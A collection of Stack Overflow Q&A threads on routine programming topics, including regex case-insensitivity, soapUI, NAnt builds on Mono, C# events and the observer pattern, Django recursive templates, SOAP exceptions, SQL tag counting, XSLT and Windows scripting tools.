{ "language": "en", "url": "https://stackoverflow.com/questions/32003", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "12" }
Q: Is regex case insensitivity slower? Source RegexOptions.IgnoreCase is more expensive than I would have thought (eg, should be barely measurable) Assuming that this applies to PHP, Python, Perl, Ruby etc as well as C# (which is what I assume Jeff was using), how much of a slowdown is it and will I incur a similar penalty with /[a-zA-z]/ as I will with /[a-z]/i ? A: Yes, [A-Za-z] will be much faster than setting the RegexOptions.IgnoreCase, largely because of Unicode strings. But it's also much more limiting -- [A-Za-z] does not match accented international characters, it's literally the A-Za-z ASCII set and nothing more. I don't know if you saw Tim Bray's answer to my message, but it's a good one: One of the trickiest issues in internationalized search is upper and lower case. This notion of case is limited to languages written in the Latin, Greek, and Cyrillic character sets. English-speakers naturally expect search to be case-insensitive if only because they’re lazy: if Nadia Jones wants to look herself up on Google she’ll probably just type in nadia jones and expect the system to take care of it. So it’s fairly common for search systems to “normalize” words by converting them all to lower- or upper-case, both for indexing and queries. The trouble is that the mapping between cases is not always as straightforward as it is in English. For example, the German lower-case character “ß” becomes “SS” when upper-cased, and good old capital “I” when down-cased in Turkish becomes the dotless “ı” (yes, they have “i”, its upper-case version is “İ”). I have read (but not verified first-hand) that the rules for upcasing accented characters such “é” are different in France and Québec. One of the results of all this is that software such as java.String.toLowerCase() tends to run astonishingly slow as it tries to work around all these corner-cases. http://www.tbray.org/ongoing/When/200x/2003/10/11/SearchI18n A: If you can tolerate having numbers and underscores in that regex, you can e.g. use the \w modifier (Perl syntax). I believe some engines support [:alpha:], but that is not pure Perl. \w takes into account the locale you are in, and matches both uppercase and lowercase, and I bet it is faster than using [A-Z] while ignoring case. A: If you're concerned about this, it may be worthwhile to set the case to all upper or all lower before you check. For instance, in Perl: $x = "abbCCDGBAdgfabv"; (lc $x) =~ /bad/; May in some cases be better than $x = "abbCCDGBAdgfabv"; $x =~ /bad/i;
{ "language": "en", "url": "https://stackoverflow.com/questions/32010", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "15" }
Q: Is soapUI the best web services testing tool/client/framework? I have been working on a web services related project for about the last year. Our team found soapUI near the start of our project and we have been mostly(*) satisfied with it (the free version, that is). My question is: are there other tools/clients/frameworks that you have used/currently use for web services testing and would recommend? (*) There are some weird GUI glitches that appear once in a while. As is mentioned by some of the answers, we attributed this to a memory leak. A: I use soapUI, and it's generally pretty good. Be aware that it seems to leak memory, and eventually it will no longer save your project, so save regularly! This is about the only hassle I have with it (other than the general ugliness that almost every Java application has!), and I can't live without it. A: There's an eclipse plugin that allows you to do web service discovery, testing, etc - see Eclipse Web Services Tools. I think it's much better than SoapUI, at least on Mac OS X. A: Call it laziness but I kind of gave up looking a while after I found SoapUI - its not perfect (what is) but it does its job very well (especially given the price). More importantly given that there is scripting to allow you to set up automated tests we're heading towards an investment in the product. Might be nice if it was better on Windows (we do .NET development, mostly ASP.NET) but for the price... (-: A: I've released an open source project for generating web service requests and making calls. Whether something is the best is pretty subjective but give the program a try and compare it for yourself Download it at http://drexyia.github.io/WsdlUI/ A: We've been using SoapUI since 1.x (will soon be adopting 3.0 from 2.5.1) and are all happy. It's much more stable when running with native LnF (File - Preferences - UI Settings - Native LF). I know it's available as an Eclipse plugin as well, but last I tried I failed to find how to add JAR-files to it (i.e. bin/ext in the stand-alone variant).
{ "language": "en", "url": "https://stackoverflow.com/questions/32020", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "14" }
Q: NAnt and dual platform build - best way to build on Windows AND Mono/Linux I'm new to NAnt but have some experience with Ant and CruiseControl. What I want to do is have my SVN project include all tools needed (like NUnit and Mocks etc) so I can check out onto a fresh machine and build. This strategy is outlined by J.P Boodhoo here. So far so good if I only want to run on Windows, but I want to be able to check out onto Linux and build/test/run against Mono too. I want no dependencies external to the SVN project. I don't mind having two sets of tools in the project but want only one NAnt build file This must be possible - but how? what are the tricks / 'traps for young players' A: This shouldn't be a particularly difficult excercise. We do some fairly similar stuff on one of my projects since half of it runs on Java using Ant to run relevant targets, and the other half is .Net (C#) for the UI. The projects get run on windows machines for development, but the servers (Java) run linux, but in the UAT environment (linux) we need to run the nunits (integration tests). The real trick (not really a difficult trick) behind this is having a NAnt build file that can run in both environments which seems to be the same thing you're trying to do here. Of course you realise you'll need to install NAnt on Mono first: $ export MONO_NO_UNLOAD=1 $ make clean $ make $ mono bin/NAnt.exe clean build And then your build file needs to be written in such a way that it seperates concerns. Some parts of the build file written for windows will not work in linux for example. So you really just need to divide it up ito specific targets in the build file. After that, there are a number of ways you can run a specific targets from the command line. An example might look like this: <project name="DualBuild"> <property name="windowsDotNetPath" value="C:\WINDOWS\Microsoft.NET\Framework\v3.5" /> <property name="windowsSolutionPath" value="D:\WorkingDirectory\branches\1234\source" /> <property name="windowsNUnitPath" value="C:\Program Files\NUnit-Net-2.0 2.2.8\bin" /> <property name="monoPath" value="You get the idea..." /> <target name="BuildAndTestOnWindows" depends="WinUpdateRevision, WinBuild, WinTest" /> <target name="BuildAndTestOnLinux" depends="MonoUpdateRevision, MonoBuild, MonoTest" /> <target name="WinUpdateRevision"> <delete file="${windowsSolutionPath}\Properties\AssemblyInfo.cs" /> <exec program="subwcrev.exe" basedir="C:\Program Files\TortoiseSVN\bin\" workingdir="${windowsSolutionPath}\Properties" commandline="${windowsSolutionPath} .\AssemblyInfoTemplate.cs .\AssemblyInfo.cs" /> <delete file="${windowsSolutionPath}\Properties\AssemblyInfo.cs" /> <exec program="subwcrev.exe" basedir="C:\Program Files\TortoiseSVN\bin\" workingdir="${windowsSolutionPath}\Properties" commandline="${windowsSolutionPath} .\AssemblyInfoTemplate.cs .\AssemblyInfo.cs" /> </target> <target name="WinBuild"> <exec program="msbuild.exe" basedir="${windowsDotNetPath}" workingdir="${windowsSolutionPath}" commandline="MySolution.sln /logger:ThoughtWorks.CruiseControl.MsBuild.XmlLogger, ThoughtWorks.CruiseControl.MsBuild.dll;msbuild-output.xml /nologo /verbosity:normal /noconsolelogger /p:Configuration=Debug /target:Rebuild" /> </target> <target name="WinTest"> <exec program="NCover.Console.exe" basedir="C:\Program Files\NCover" workingdir="${windowsSolutionPath}"> <arg value="//x &quot;ClientCoverage.xml&quot;" /> <arg value="&quot;C:\Program Files\NUnit-Net-2.0 2.2.8\bin \nunit-console.exe&quot; MySolution.nunit /xml=nunit-output.xml /nologo" /> </exec> </target> <target name="MonoUpdateRevision"> You get the idea... </target> <target name="MonoBuild"> You get the idea... </target> <target name="MonoTest"> You get the idea... </target> </project> For brevity, I've left both sides out. The neat thing is you can use NUnit as well as NAnt on both environments and that makes things really easy from a dependency point of view. And for each executable you can swap out for others that work in that environment, for example (xBuild for MSBuild, and svn for tortoise etc) For more help on Nunit etc on Mono, check out this fantastic post. Hope that helps, Cheers, Rob G A: @Rob G - Hey! That's my post! ;) For some other good examples, be sure to browse the NUnit source code. I work closely with Charlie whenever I can to make sure it is building and testing on Mono. He tries to run whenever he can as well. A: It is worth noting that a lot of tools like Nant run on mono 'out of the box', i.e. mono nant.exe works A: I use the following template. It allows simple building on any platform (build on Win or ./build.sh on linux) and minimises duplication in the build scripts. The NAnt executable is stored with the project in tools\nant. The build config file determines which build tool to use, either MSBuild or xbuild (in this case, for Windows I require the VS2015 MSBuild version, change the path as required). The build-csproj build target can be reused for when you have multiple projects within a solution. The test-project target would need to be expanded upon for your needs. build.bat @tools\nant\nant.exe %* build.sh #!/bin/sh /usr/bin/cli tools/nant/NAnt.exe "$@" default.build <?xml version="1.0"?> <project name="MyProject" default="all"> <if test="${not property::exists('configuration')}"> <property name="configuration" value="release" readonly="true" /> </if> <if test="${platform::is-windows()}"> <property name="BuildTool" value="C:\Program Files (x86)\MSBuild\14.0\Bin\MSBuild.exe" readonly="true"/> </if> <if test="${platform::is-unix()}"> <property name="BuildTool" value="xbuild" readonly="true"/> </if> <property name="TestTool" value="tools/mytesttool.exe"/> <target name="all" depends="myproject myprojectlib" /> <target name="build-csproj" description="Build a given csproj"> <!-- Must not be called standalone as it requires some properties set. --> <exec program="${BuildTool}"> <arg path="src/${ProjectName}/${ProjectName}.csproj" /> <arg line="/property:Configuration=${configuration}" /> <arg value="/target:Rebuild" /> <arg value="/verbosity:normal" /> <arg value="/nologo" /> </exec> </target> <target name="test-project"> <!-- Must not be called standalone as it requires some properties set. --> <exec program="${TestTool}"> <arg path="my/${ProjectName}/tests/path/for/tool" /> <arg value="/aproperty=value" /> </exec> </target> <target name="myproject" description="Build the project"> <property name="ProjectName" value="MyProject"/> <call target="build-csproj" /> <call target="test-project" /> </target> <target name="myprojectlib" description="Build the project's library dll"> <property name="ProjectName" value="MyProjectLib"/> <call target="build-csproj" /> <call target="test-project" /> </target> </project>
{ "language": "en", "url": "https://stackoverflow.com/questions/32027", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: In C#, isn't the observer pattern already implemented using Events? After reading the Head First Design Patterns book and using a number of other design patterns, I'm trying to understand the Observer pattern. Isn't this already implemented using Events in the .NET Framework? A: Yes, it's identical. A note: if you really want to understand events, I recommend learning the observer pattern and implementing it yourself a for a while. Once you fully understand it, stop doing it yourself and use the professional and well-documented implementation unless you have a real need to do otherwise. A: That's right, events are an implementation of the observer pattern. I have read discussions , though, of people who still write their own, to give them either more flexibility, or maybe just to avoid the event-raising syntax. A: Yes, but programming the observer pattern explicitly and thus not using delegates and events can result in easier debugging of your code. Consider the difference: public void NotifyObservers() { foreach(Product product in ProductList) { if (product is IProductObserver) { product.Update(this) } } } Here it is very clear what products in the list get notified of a change. While debugging you can inspect the ProductList... With using delegates and events it can be more cumbersome to find out how many "delegates" were actually "subscribed" to handle the event. A: Yes, it is. The observer pattern is also called the publish/subscribe pattern, which is exactly what events allow you to do. A: I would say yes, it was Anders Heljsberg's intent to make the observer pattern a first-class language feature with events in C#, based on his experience with Delphi. Anders makes this and other design intentions clear in an excellent interview on Software Engineering Radio. A: Most modern languages have native support for some of the design patterns. It has been argued that languages are better the more patterns they support natively without the need to implement them explicitly, and that Lisp is excellent in this regard. Jeff had something to say about that, too. A: Microsoft Itself States that using events and delegates is the c# way of applying the Observer Pattern. Using some basic naming conventions for events and delegates they named their own pattern as "Event Pattern" which does exactly the same thing providing some extra advantages over the classic Observer Pattern. "Event Pattern" is described in the MSDN Library inside the "Exploring the Observer Design Pattern" Article. Reference MSDN Article Based on events and delegates, the FCL uses the Observer pattern quite extensively. The designers of the FCL fully realized the inherent power of this pattern, applying it to both user interface and non-UI specific features throughout the Framework. This use, however, is a slight variation on the base Observer pattern, which the Framework team has termed the Event Pattern. In general, this pattern is expressed as formal naming conventions for delegates, events, and related methods involved in the event notification process. Microsoft recommends that all applications and frameworks that utilize events and delegates adopt this pattern, although there is no enforcement in the CLR or standard compiler Based on this examination of the Observer pattern, it should be evident that this pattern provides an ideal mechanism to ensure crisp boundaries between objects in an application, regardless of their function (UI or otherwise). Although fairly simple to implement via callbacks (using the IObserver and IObservable interfaces), the CLR concepts of delegates and events handle the majority of the "heavy lifting," as well as decreasing the level of coupling between subject and observer. A: No, they achieve the same intent, however they are different. I would say that the Observer pattern is quite a hack of over design to achieve something you could have achieved easily with functional programming, and that .NET events uses functional programming to achieve the same goal.
{ "language": "en", "url": "https://stackoverflow.com/questions/32034", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "33" }
Q: How to remove debug statements from production code in Java Is it possible for the compiler to remove statements used for debugging purposes (such as logging) from production code? The debug statements would need to be marked somehow, maybe using annotations. It's easy to set a property (debug = true) and check it at each debug statement, but this can reduce performance. It would be nice if the compiler would simply make the debug statements vanish. A: Two recommendations. First: for real logging, use a modern logging package like log4j or java's own built in logging. Don't worry about performance so much, the logging level check is on the order of nanoseconds. (it's an integer comparison). And if you have more than a single log statement, guard the whole block: (log4j, for example:) if (logger.isDebugEnabled()) { // perform expensive operations // build string to log logger.debug("...."); } This gives you the added ability control logging at runtime. Having to restart and run a debug build can be very inconvenient. Second: You may find assertions are more what you need. An assertion is a statement which evaluates to a boolean result, with an optional message: assert (sky.state != FALLING) : "The sky is falling!"; Whenever the assertion results in a false, the assertion fails and an AssertionError is thrown containing your message (this is an unchecked exception, intended to exit the application). The neat thing is, these are treated special by the JVM and can toggled at runtime down to the class level, using a VM parameter (no recompile needed). If not enabled, there is zero overhead. A: public abstract class Config { public static final boolean ENABLELOGGING = true; } import static Config.*; public class MyClass { public myMethod() { System.out.println("Hello, non-logging world"); if (ENABLELOGGING) { log("Hello, logging world."); } } } The compiler will remove the code block with "Hello, logging world." in it if ENABLE_LOGGING is set to true because it's a static final value. If you use an obfuscator such as proguard, then the Config class will vanish too. An obfuscator would also allow things like this instead: public class MyClass { public myMethod() { System.out.println("Hello, non-logging world"); Log.log("Hello, logging world."); } } import static Config.*; public abstract class Log { public static void log(String s) { if (ENABLELOGGING) { log(s); } } } The method Log#log would reduce to nothing in the compiler, and be removed by the obfuscator, along with any calls to that method and eventually even the Log class would itself be removed. A: Another possibility is to put the if statement within your logging function, you get less code this way, but at the expense of some extra function calls. I'm also not a big fan of completely removing the debug code. Once you're in production, you'll probably need access to debug messages if something goes wrong. If you remove all of your code level debugging, than this isn't a possibility. A: This "trick" seems to make your debug statements vanished public static final boolean DEBUG = false; if (DEBUG) { //disapeared on compilation } The post said that javac is smart enough to check the static final boolean and exclude the debug statements. (I did not personally try it) For logging, I personally donot like to see code like: if (logger.isDebugEnabled()) { logger.debug("...."); } realImportantWork(); The logging things distracts me from the realImportantWork(). The right way for me is: logger.debug("...."); realImportantWork() plus the config which excludes all debug messages on Production. I mean that the logger.isDebugEnabled() control should be the job of the logging framework, not my job. Most logging framework support concepts like "logger", "LogLevel".. which can do the trick. A: Use Java Preprocessor? (google foo low but this is a link to the old Joel forums discussing it) A: Java contains some sort of preprocessor of its own. It's called APT. It processes and generates code. At the moment I'm not sure how this should work (I haven't tried it). But it seems to be used for these kind of things. A: I would also highly recommend using a logging framework. The logger.IsDebugEnabled() is not mandatory, it is just that it can be faster to check whether the system is in the debug level before logging. Using a logging framework means you can configure logging levels on the fly without restarting the application. You could have logging like: logger.error("Something bad happened") logger.debug("Something bad happend with loads more detail") A: To directly answer your question: I don't know. But here is another solution to your problem: In my mind, there are two statements that collide with each other here: "debug statements" and "production code". What is the purpose of debug statements? Help to get rid of bugs while (unit) testing. If a piece of software is properly tested and works according to the requirements, debug statements are nothing else but OBSOLETE. I strongly disagree with leaving any debug statements in production code. I bet nobody bothers testing side-effects of debug code in production code. The code probably does what it's supposed to do, but does it do more than that? Do all your #defines work correctly and really take ALL of the debug code out? Who analyzes 100000 lines of pre-processed code to see if all the debug stuff is gone? Unless we have a different definition of production code, you should consider taking out the debug statements after the code is tested and be done with it.
{ "language": "en", "url": "https://stackoverflow.com/questions/32041", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "16" }
Q: How can I render a tree structure (recursive) using a django template? I have a tree structure in memory that I would like to render in HTML using a Django template. class Node(): name = "node name" children = [] There will be some object root that is a Node, and children is a list of Nodes. root will be passed in the content of the template. I have found this one discussion of how this might be achieved, but the poster suggests this might not be good in a production environment. Does anybody know of a better way? A: I had the same problem and I wrote a template tag. I know there are other tags like this out there but I needed to learn to make custom tags anyway :) I think it turned out pretty well. Read the docstring for usage instructions. github.com/skid/django-recurse A: Using with template tag, I could do tree/recursive list. Sample code: main template: assuming 'all_root_elems' is list of one or more root of tree <ul> {%for node in all_root_elems %} {%include "tree_view_template.html" %} {%endfor%} </ul> tree_view_template.html renders the nested ul, li and uses node template variable as below: <li> {{node.name}} {%if node.has_childs %} <ul> {%for ch in node.all_childs %} {%with node=ch template_name="tree_view_template.html" %} {%include template_name%} {%endwith%} {%endfor%} </ul> {%endif%} </li> A: I'm too late. All of you use so much unnecessary with tags, this is how I do recursive: In the "main" template: <!-- lets say that menu_list is already defined --> <ul> {% include "menu.html" %} </ul> Then in menu.html: {% for menu in menu_list %} <li> {{ menu.name }} {% if menu.submenus|length %} <ul> {% include "menu.html" with menu_list=menu.submenus %} </ul> {% endif %} </li> {% endfor %} A: I think the canonical answer is: "Don't". What you should probably do instead is unravel the thing in your view code, so it's just a matter of iterating over (in|de)dents in the template. I think I'd do it by appending indents and dedents to a list while recursing through the tree and then sending that "travelogue" list to the template. (the template would then insert <li> and </li> from that list, creating the recursive structure with "understanding" it.) I'm also pretty sure recursively including template files is really a wrong way to do it... A: this might be way more than you need, but there is a django module called 'mptt' - this stores a hierarchical tree structure in an sql database, and includes templates for display in the view code. you might be able to find something useful there. here's the link : django-mptt A: Yes, you can do it. It's a little trick, passing the filename to {% include %} as a variable: {% with template_name="file/to_include.html" %} {% include template_name %} {% endwith %} A: Django has a built in template helper for this exact scenario: https://docs.djangoproject.com/en/dev/ref/templates/builtins/#unordered-list A: Does no one like dicts ? I might be missing something here but it would seem the most natural way to setup menus. Using keys as entries and values as links pop it in a DIV/NAV and away you go ! From your base # Base.html <nav> {% with dict=contents template="treedict.html" %} {% include template %} {% endwith %} <nav> call this # TreeDict.html <ul> {% for key,val in dict.items %} {% if val.items %} <li>{{ key }}</li> {%with dict=val template="treedict.html" %} {%include template%} {%endwith%} {% else %} <li><a href="{{ val }}">{{ key }}</a></li> {% endif %} {% endfor %} </ul> It haven't tried the default or the ordered yet perhaps you have ? A: correct this: root_comment.html {% extends 'students/base.html' %} {% load i18n %} {% load static from staticfiles %} {% block content %} <ul> {% for comment in comments %} {% if not comment.parent %} ## add this ligic {% include "comment/tree_comment.html" %} {% endif %} {% endfor %} </ul> {% endblock %} tree_comment.html <li>{{ comment.text }} {%if comment.children %} <ul> {% for ch in comment.children.get_queryset %} # related_name in model {% with comment=ch template_name="comment/tree_comment.html" %} {% include template_name %} {% endwith %} {% endfor %} </ul> {% endif %} </li> for example - model: from django.db import models from django.contrib.auth.models import User from django.utils.translation import ugettext_lazy as _ # Create your models here. class Comment(models.Model): class Meta(object): verbose_name = _('Comment') verbose_name_plural = _('Comments') parent = models.ForeignKey( 'self', on_delete=models.CASCADE, parent_link=True, related_name='children', null=True, blank=True) text = models.TextField( max_length=2000, help_text=_('Please, your Comment'), verbose_name=_('Comment'), blank=True) public_date = models.DateTimeField( auto_now_add=True) correct_date = models.DateTimeField( auto_now=True) author = models.ForeignKey(User) A: I had a similar issue, however I had first implemented the solution using JavaScript, and just afterwards considered how I would have done the same thing in django templates. I used the serializer utility to turn a list off models into json, and used the json data as a basis for my hierarchy.
{ "language": "en", "url": "https://stackoverflow.com/questions/32044", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "74" }
Q: How do I extract the inner exception from a soap exception in ASP.NET? I have a simple web service operation like this one: [WebMethod] public string HelloWorld() { throw new Exception("HelloWorldException"); return "Hello World"; } And then I have a client application that consumes the web service and then calls the operation. Obviously it will throw an exception :-) try { hwservicens.Service1 service1 = new hwservicens.Service1(); service1.HelloWorld(); } catch(Exception e) { Console.WriteLine(e.ToString()); } In my catch-block, what I would like to do is extract the Message of the actual exception to use it in my code. The exception caught is a SoapException, which is fine, but it's Message property is like this... System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Exception: HelloWorldException at WebService1.Service1.HelloWorld() in C:\svnroot\Vordur\WebService1\Service1.asmx.cs:line 27 --- End of inner exception stack trace --- ...and the InnerException is null. What I would like to do is extract the Message property of the InnerException (the HelloWorldException text in my sample), can anyone help with that? If you can avoid it, please don't suggest parsing the Message property of the SoapException. A: Unfortunately I don't think this is possible. The exception you are raising in your web service code is being encoded into a Soap Fault, which then being passed as a string back to your client code. What you are seeing in the SoapException message is simply the text from the Soap fault, which is not being converted back to an exception, but merely stored as text. If you want to return useful information in error conditions then I recommend returning a custom class from your web service which can have an "Error" property which contains your information. [WebMethod] public ResponseClass HelloWorld() { ResponseClass c = new ResponseClass(); try { throw new Exception("Exception Text"); // The following would be returned on a success c.WasError = false; c.ReturnValue = "Hello World"; } catch(Exception e) { c.WasError = true; c.ErrorMessage = e.Message; return c; } } A: It IS possible! Service operation example: try { // do something good for humanity } catch (Exception e) { throw new SoapException(e.InnerException.Message, SoapException.ServerFaultCode); } Client consuming the service: try { // save humanity } catch (Exception e) { Console.WriteLine(e.Message); } Just one thing - you need to set customErrors mode='RemoteOnly' or 'On' in your web.config (of the service project). credits about the customErrors discovery - http://forums.asp.net/t/236665.aspx/1 A: I ran into something similar a bit ago and blogged about it. I'm not certain if it is precisely applicable, but might be. The code is simple enough once you realize that you have to go through a MessageFault object. In my case, I knew that the detail contained a GUID I could use to re-query the SOAP service for details. The code looks like this: catch (FaultException soapEx) { MessageFault mf = soapEx.CreateMessageFault(); if (mf.HasDetail) { XmlDictionaryReader reader = mf.GetReaderAtDetailContents(); Guid g = reader.ReadContentAsGuid(); } }
{ "language": "en", "url": "https://stackoverflow.com/questions/32058", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "15" }
Q: How can I get the number of occurrences in a SQL IN clause? Let's say I have four tables: PAGE, USER, TAG, and PAGE-TAG: Table | Fields ------------------------------------------ PAGE | ID, CONTENT TAG | ID, NAME USER | ID, NAME PAGE-TAG | ID, PAGE-ID, TAG-ID, USER-ID And let's say I have four pages: PAGE#1 'Content page 1' tagged with tag#1 by user1, tagged with tag#1 by user2 PAGE#2 'Content page 2' tagged with tag#3 by user2, tagged by tag#1 by user2, tagged by tag#8 by user1 PAGE#3 'Content page 3' tagged with tag#7 by user#1 PAGE#4 'Content page 4' tagged with tag#1 by user1, tagged with tag#8 by user1 I expect my query to look something like this: select page.content ? from page, page-tag where page.id = page-tag.pag-id and page-tag.tag-id in (1, 3, 8) order by ? desc I would like to get output like this: Content page 2, 3 Content page 4, 2 Content page 1, 1 Quoting Neall Your question is a bit confusing. Do you want to get the number of times each page has been tagged? No The number of times each page has gotten each tag? No The number of unique users that have tagged a page? No The number of unique users that have tagged each page with each tag? No I want to know how many of the passed tags appear in a particular page, not just if any of the tags appear. SQL IN works like an boolean operator OR. If a page was tagged with any value within the IN Clause then it returns true. I would like to know how many of the values inside of the IN clause return true. Below i show, the output i expect: page 1 | in (1,2) -> 1 page 1 | in (1,2,3) -> 1 page 1 | in (1) -> 1 page 1 | in (1,3,8) -> 1 page 2 | in (1,2) -> 1 page 2 | in (1,2,3) -> 2 page 2 | in (1) -> 1 page 2 | in (1,3,8) -> 3 page 4 | in (1,2,3) -> 1 page 4 | in (1,2,3) -> 1 page 4 | in (1) -> 1 page 4 | in (1,3,8) -> 2 This will be the content of the page-tag table i mentioned before: id page-id tag-id user-id 1 1 1 1 2 1 1 2 3 2 3 2 4 2 1 2 5 2 8 1 6 3 7 1 7 4 1 1 8 4 8 1 @Kristof does not exactly what i am searching for but thanks anyway. @Daren If i execute you code i get the next error: #1054 - Unknown column 'page-tag.tag-id' in 'having clause' @Eduardo Molteni Your answer does not give the output in the question but: Content page 2 8 Content page 4 8 content page 2 3 content page 1 1 content page 1 1 content page 2 1 cotnent page 4 1 @Keith I am using plain SQL not T-SQL and i am not familiar with T-SQL, so i do not know how your query translate to plain SQL. Any more ideas? A: This might work: select page.content, count(page-tag.tag-id) as tagcount from page inner join page-tag on page-tag.page-id = page.id group by page.content having page-tag.tag-id in (1, 3, 8) A: OK, so the key difference between this and kristof's answer is that you only want a count of 1 to show against page 1, because it has been tagged only with one tag from the set (even though two separate users both tagged it). I would suggest this: SELECT page.ID, page.content, count(*) AS uniquetags FROM ( SELECT DISTINCT page.content, page.ID, page-tag.tag-id FROM page INNER JOIN page-tag ON page.ID=page-tag.page-ID WHERE page-tag.tag-id IN (1, 3, 8) ) GROUP BY page.ID I don't have a SQL Server installation to check this, so apologies if there's a syntax mistake. But semantically I think this is what you need. This may not give the output in descending order of number of tags, but try adding: ORDER BY uniquetags DESC at the end. My uncertainty is whether you can use ORDER BY outside of grouping in SQL Server. If not, then you may need to nest the whole thing in another SELECT. A: In T-Sql: select count(distinct name) from page-tag where tag-id in (1, 3, 8) This will give you a count of the number of different tag names for your list of ids A: Agree with Neall, bit confusing the question. If you want the output listed in the question, the sql is as simple as: select page.content, page-tag.tag-id from page, page-tag where page.id = page-tag.pag-id and page-tag.tag-id in (1, 3, 8) order by page-tag.tag-id desc But if you want the tagcount, Daren answered your question A: select page.content, count(pageTag.tagID) as tagCount from page inner join pageTag on page.ID = pageTag.pageID where pageTag.tagID in (1, 3, 8) group by page.content order by tagCount desc That gives you the number of tags per each page; ordered by the higher number of tags I hope I understood your question correctly A: Leigh Caldwell answer is correct, thanks man, but need to add an alias at least in MySQL. So the query will look like: SELECT page.ID, page.content, count(*) AS uniquetags FROM ( SELECT DISTINCT page.content, page.ID, page-tag.tag-id FROM page INNER JOIN page-tag ON page.ID=page-tag.page-ID WHERE page-tag.tag-id IN (1, 3, 8) ) as page GROUP BY page.ID order by uniquetags desc
{ "language": "en", "url": "https://stackoverflow.com/questions/32059", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "1" }
Q: Nodesets Length In XLST how would you find out the length of a node-set? A: there is no need to put that into a <xsl:variable name="length" select="count(nodes/node)"/> though... you can just print it out as follows: <xsl:value-of select="count(nodes/node)"/> or use it in a if-clause as follows: <xsl:if test="count(comments/comment) > '0'"> <ul> <xsl:apply-templates select="comments/comment"/> </ul> </xsl:if> A: Generally in XSLT things aren't referred to as Arrays, since there is really no such thing in XSLT. The technical term is either nodesets (made up of zero or more nodes) or in XSLT 2.0 sequences. A: <xsl:variable name="length" select="count(nodeset)"/>
{ "language": "en", "url": "https://stackoverflow.com/questions/32085", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "11" }
Q: What tools and languages are available for windows shell scripting? I want to know what are the options to do some scripting jobs in windows platform. I need functionality like file manipulations, registry editing etc. Can files be edited using scripting tools? What other functionality does windows scripting tools offer? Can everything that can be done using the Windows GUI be done using a scripting language? A: I think Windows PowerShell from Microsoft is the current favourite for this sort of thing. A: It might be worth looking at the prerelease of version 2.0. A lot of stuff has changed: http://blogs.msdn.com/powershell/archive/2007/11/06/what-s-new-in-ctp-of-powershell-2-0.aspx A: How about installing a windows version of Python, Perl or your favorite language? These should offer all the functionality you need. A: Batch files are the most portable, but doing complicated things can get hard (very hard). Powershell is incredibly - um - powerful, but the installed domain at the moment is only slightly more than those people who like using powershell and servers they administer. If you control the machines you're scripting on and can mandate that powershell is installed, powershell is the way to go. Otherwise, batch files are the best way. Powershell lets you do anything which can be done, but some things will be harder than others :) (Seriously, if you want to control a windows GUI app from a script, you're going to have a lot of pain unless the app supports scripting itself, or you want to start posting messages to dialog controls and screen scraping the dialog to check for success.) A: I would recommend "Take Command" (JPSoft), which is more like "cmd.exe" than the PowerShell. We use here at ESSS for years. A: Windows Scripting Languages Also take a look at PowerShell A: CScript ? I remember seeing something like that. A: Powershell is nice, but it's an extra thing you have to install. Not standard in almost any windows installation. So, if it's just for your own use, then powershell should be fine. If you need the scripts to run on the computers of the general population, for instance, as part of a piece of software you are producing, it may not be the best option. If you are ok with an extra thing you have to install, you might want to check out cygwin. This allows you to have a full Linux bash command line and all the associated tools at your disposal. If you need something included in a default windows install. There's the windows command line (cmd.exe). Which has some functionality, but is very deficient compared to what's available in Linux. The other, probably worse problem, is that there isn't much out there in the way of documentation. You might also be interested in VB Script (flame away). VB Script should work on almost any recent standard windows install, and is a lot more functional than the command line. A: I have cygwin installed, so I can run bash shell scripts for my automatization needs. Besides, when I need stuff running moreless natively on Windows, I use a combination of batch + jscript (runs on cmdline if you have Visual Studio.Net installed, just call "cscript XXX.js"). A: Scripting is a blast. Personally I like to write some evil little batch files. You can find a command line program to do just about anything. I prefer Batch files mostly because they are portable from one machine to another with at most a zip with a few unix tools (SSED, GREP, GAWK). there is a commandline REG.Exe that can even do Registry changes and reads. You can parse output from commands with a "FOR /f" loop. PowerShell does have more... err.. Power (2nd post I wrote that in, but I can't help it.) If you want to look at windows automation check out AutoHotKey. What are you trying to automate? That may help us narrow down what would be helpfull. * *Josh EDIT: for the record I typed that at the same time as @jameso If someone at work hadn't asked me a question, I may have posted before him. I did get a bit of a shiver at the similarity of the post though.... A: Powershell can do what you need. file manipulations This SO post answers how you can replace a string in your text file. Pasting it here for easy reference: (Get-Content c:\temp\test.txt).replace('[MYID]', 'MyValue') | Set-Content c:\temp\test.txt There are other things that you can do, such as copying files and folders. You can find out more on the Windows Powershell Documentation registry editing This can be easily done using Powershell. Here's a sample code from Microsoft Dev Blogs: Set-ItemProperty -Path HKCU:\Software\hsg -Name newproperty -Value anewvalue A: Yesterday I could have repaired this for you ;) What all are the tools/languages for windows shell scripting? Would read better as What tools and languages are available for windows shell scripting?
{ "language": "en", "url": "https://stackoverflow.com/questions/32087", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
